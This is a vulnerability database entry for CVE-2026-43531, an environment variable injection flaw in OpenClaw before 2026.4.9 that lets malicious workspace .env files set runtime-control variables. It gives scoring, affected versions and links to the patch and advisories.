CVE-2026-43531

HIGH EPSS 10.3%
Published May 5, 20261mo ago · Modified Jun 17, 20261w ago
7.0 CVSS 4.0
High
Find Similar
Published May 5, 2026 1mo ago
Last Modified Jun 17, 2026 1w ago

Description

OpenClaw before 2026.4.9 contains an environment variable injection vulnerability allowing malicious workspace .env files to set runtime-control variables. Attackers can inject variables affecting update sources, gateway URLs, ClawHub resolution, and browser executable paths to compromise application behavior.

CVSS Details

Base Score
7.0
Exploitability
Impact
Vector string
CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector Local
Attack Complexity Low
Privileges Required Low
User Interaction P
Scope X

Threat Intelligence

EPSS Exploit Probability
10.3% percentile
Exploit & Patch Status
No Known Exploit
Patch Available

Weaknesses 1

CWE-15

Affected Products 1

VendorProductVersionRange
openclawopenclaw* <2026.4.9

References 3

  • github.com https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c
    Patch
  • github.com https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc
    Vendor Advisory
  • vulncheck.com https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file
    Third Party Advisory

Remediation

  • github.com https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c
    Patch